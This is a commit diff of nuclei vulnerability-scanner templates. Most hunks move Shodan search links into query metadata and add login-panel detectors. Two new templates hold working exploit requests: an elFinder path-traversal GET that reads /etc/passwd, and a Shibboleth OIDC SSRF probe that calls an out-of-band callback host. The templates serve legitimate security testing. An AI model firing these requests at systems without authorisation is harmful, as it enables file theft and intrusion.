update nuclei-templates 2022-07-05 22:27:1657031265

Author: x51pwn

config/nuclei-templates/cves/2021/CVE-2021-26855.yaml

@@ -9,7 +9,6 @@ info:
     - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
     - https://proxylogon.com/#timeline
     - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
-    - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
     - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
   remediation: Apply the appropriate security update.
   classification:

config/nuclei-templates/cves/2021/CVE-2021-40875.yaml

@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2021-40875
     cwe-id: CWE-863
   metadata:
-    shodan-query: https://www.shodan.io/search?query=TestRail
+    shodan-query: http.html:"TestRail"
   tags: cve,cve2021,exposure,gurock,testrail
 
 requests:

config/nuclei-templates/cves/2021/CVE-2021-41773.yaml

@@ -19,7 +19,7 @@ info:
     cve-id: CVE-2021-41773
     cwe-id: CWE-22
   metadata:
-    shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
+    shodan-query: apache version:2.4.49
   tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa
 
 requests:

config/nuclei-templates/cves/2022/CVE-2022-24129.yaml

@@ -0,0 +1,35 @@
+id: CVE-2022-24129
+
+info:
+  name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery
+  author: 0x_Akoko
+  severity: high
+  description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services.
+  reference:
+    - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
+    - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24129
+    - http://shibboleth.net/community/advisories/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2022-24129
+    cwe-id: CWE-918
+  tags: cve,cve2022,ssrf,oidc,shibboleth
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "ShibbolethIdp"

config/nuclei-templates/cves/2022/CVE-2022-26960.yaml

@@ -0,0 +1,38 @@
+id: CVE-2022-26960
+
+info:
+  name: elFinder - Path Traversal
+  author: pikpikcu
+  severity: critical
+  description: |
+    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+    - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
+    - https://www.synacktiv.com/publications.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2022-26960
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/default-logins/abb/cs141-default-login.yaml

@@ -10,7 +10,7 @@ info:
   classification:
     cwe-id: CWE-798
   metadata:
-    shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+    shodan-query: http.html:"CS141"
   tags: hiawatha,iot,default-login
 
 requests:

config/nuclei-templates/default-logins/azkaban/azkaban-default-login.yaml

@@ -5,10 +5,10 @@ info:
   author: pussycat0x
   severity: high
   description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs.  Default web client credentials were discovered.
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
   classification:
     cwe-id: CWE-798
+  metadata:
+    shodan-query: http.title:"Azkaban Web Client"
   tags: default-login,azkaban
 
 requests:

config/nuclei-templates/exposed-panels/achecker-panel.yaml

@@ -0,0 +1,26 @@
+id: achecker-panel
+
+info:
+  name: AChecker Login Panel
+  author: princechaddha
+  severity: info
+  tags: panel,achecker
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/checker/login.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - ": Web Accessibility Checker</title>"
+          - "AChecker - Copyright"
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/adobe/adobe-experience-manager-login.yaml

@@ -6,10 +6,11 @@ info:
   severity: info
   description: An Adobe Experience Manager login panel was detected.
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
     - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"AEM Sign In"
   tags: panel,aem,adobe
 
 requests:

config/nuclei-templates/exposed-panels/adobe/adobe-media-server.yaml

@@ -6,10 +6,11 @@ info:
   severity: info
   description: An Adobe Media Server login panel was detected.
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
     - https://helpx.adobe.com/support/adobe-media-server.html
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"Adobe Media Server"
   tags: panel,adobe
 
 requests:

config/nuclei-templates/exposed-panels/azkaban-web-client.yaml

@@ -7,9 +7,10 @@ info:
   description: An Azkaban web client panel was discovered.
   reference:
     - https://azkaban.github.io/
-    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"Azkaban Web Client"
   tags: panel,azkaban
 
 requests:

config/nuclei-templates/exposed-panels/cisco/cisco-sendgrid.yaml

@@ -4,8 +4,8 @@ info:
   name: Cisco ServiceGrid
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+  metadata:
+    shodan-query: http.title:"Cisco ServiceGrid"
   tags: panel,cisco
 
 requests:

config/nuclei-templates/exposed-panels/clearpass-policy-manager.yaml

@@ -4,8 +4,8 @@ info:
   name: ClearPass Policy Manager - Aruba Networks
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+  metadata:
+    shodan-query: http.title:"ClearPass Policy Manager"
   tags: panel,aruba
 
 requests:

config/nuclei-templates/exposed-panels/coldfusion-administrator-login.yaml

@@ -4,10 +4,8 @@ info:
   name: ColdFusion Administrator Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
   metadata:
-    shodan-query: http.component:"Adobe ColdFusion"
+    shodan-query: http.title:"ColdFusion Administrator Login"
   tags: panel,coldfusion,adobe
 
 requests:
@@ -19,7 +17,7 @@ requests:
     matchers:
       - type: word
         words:
-          - '<title>ColdFusion Administrator Login</title>'
+          - 'ColdFusion Administrator Login'
 
       - type: status
         status:

config/nuclei-templates/exposed-panels/cortex-xsoar-login.yaml

@@ -4,8 +4,8 @@ info:
   name: Cortex XSOAR Login Panel
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22
+  metadata:
+    shodan-query: http.title:"Cortex XSOAR"
   tags: panel,soar,login
 
 requests:

config/nuclei-templates/exposed-panels/dell-openmanager-login.yaml

@@ -4,8 +4,8 @@ info:
   name: Dell OpenManage Switch Administrator
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
+  metadata:
+    shodan-query: html:"Dell OpenManage Switch Administrator"
   tags: panel,dell
 
 requests:

config/nuclei-templates/exposed-panels/docebo-elearning-panel.yaml

@@ -0,0 +1,26 @@
+id: docebo-elearning-panel
+
+info:
+  name: Docebo E-learning Login Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="Docebo E-learning"
+  tags: panel,docebo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Docebo E-learning"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/f-secure-policy-manager.yaml

@@ -4,8 +4,8 @@ info:
   name: F-Secure Policy Manager Server
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
+  metadata:
+    shodan-query: http.title:"F-Secure Policy Manager Server"
   tags: login,panel
 
 requests:

config/nuclei-templates/exposed-panels/faraday-login.yaml

@@ -4,8 +4,8 @@ info:
   name: Faraday Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=html%3A%22faradayApp%22
+  metadata:
+    shodan-query: html:"faradayApp"
   tags: panel,faraday
 
 requests:

config/nuclei-templates/exposed-panels/glpi-authentication.yaml

@@ -4,8 +4,8 @@ info:
   name: GLPI - Authentication
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentication%22
+  metadata:
+    shodan-query: http.title:"GLPI - Authentication"
   tags: panel,auth,glpi
 
 requests:

config/nuclei-templates/exposed-panels/h2console-panel.yaml

@@ -7,7 +7,8 @@ info:
   reference:
     - https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ
     - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console
-    - https://www.shodan.io/search?query=http.title%3A%22H2+Console%22
+  metadata:
+    shodan-query: http.title:"H2 Console"
   tags: panel,h2,console
 
 requests:

config/nuclei-templates/exposed-panels/hp-service-manager.yaml

@@ -4,8 +4,8 @@ info:
   name: HP Service Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22
+  metadata:
+    shodan-query: http.title:"HP Service Manager"
   tags: panel,hp,service
 
 requests:

config/nuclei-templates/exposed-panels/icinga-web-login.yaml

@@ -4,8 +4,8 @@ info:
   name: Icinga Web 2 Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
+  metadata:
+    shodan-query: http.title:"Icinga Web 2 Login"
   tags: panel,icinga
 
 requests:

config/nuclei-templates/exposed-panels/identity-services-engine.yaml

@@ -4,8 +4,8 @@ info:
   name: Identity Services Engine
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
+  metadata:
+    shodan-query: http.title:"Identity Services Engine"
   tags: panel
 
 requests:

config/nuclei-templates/exposed-panels/lucee-login.yaml

@@ -4,8 +4,8 @@ info:
   name: Lucee Web/Server Administrator Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Lucee%22
+  metadata:
+    shodan-query: http.title:"Lucee"
   tags: panel,lucee
 
 requests:

config/nuclei-templates/exposed-panels/mongodb-ops-manager.yaml

@@ -4,8 +4,8 @@ info:
   name: MongoDB Ops Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22
+  metadata:
+    shodan-query: http.title:"MongoDB Ops Manager"
   tags: panel,mongodb
 
 requests:

config/nuclei-templates/exposed-panels/nginx-proxy-manager.yaml

@@ -4,8 +4,8 @@ info:
   name: Nginx Proxy Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22
+  metadata:
+    shodan-query: http.title:"Nginx Proxy Manager"
   tags: panel,nginx,proxy
 
 requests:

config/nuclei-templates/exposed-panels/okiko-sfiler-portal.yaml

@@ -4,8 +4,8 @@ info:
   name: OKIKO S-Filer Portal Detect
   author: johnk3r
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=sfiler
+  metadata:
+    shodan-query: http.title:"S-Filer"
   tags: okiko,panel
 
 requests: